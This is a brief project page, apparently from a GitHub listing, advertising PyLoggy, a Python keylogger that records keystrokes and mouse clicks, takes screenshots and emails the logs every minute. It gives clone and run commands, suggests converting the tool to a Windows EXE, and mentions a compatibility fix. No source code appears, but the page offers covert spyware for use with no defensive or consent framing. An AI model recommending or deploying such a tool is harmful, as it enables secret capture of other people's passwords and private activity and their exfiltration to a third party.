PyLoggy is simple and powerful Python keylogger that is able to log keystrokes, log mouse clicks, take screenshots and more! The tool will send the logs to your email every minute(you can change this).
Clone it:
git clone https://github.com/D4Vinci/PyLoggy.git
Run it:
python PyLoggy.py
You can also convert PyLoggy to EXE using PyInstaller or any similar tool.
changed _winreg to winreg in the import section. Earlier it didn't work on python 3.7.2 after this change it does.
A high&low-level coder and a lot of things in between. An extremely curious creature who loves to learn. Break things or make things that break things.
GitHub Repositorykeylogger python-keylogger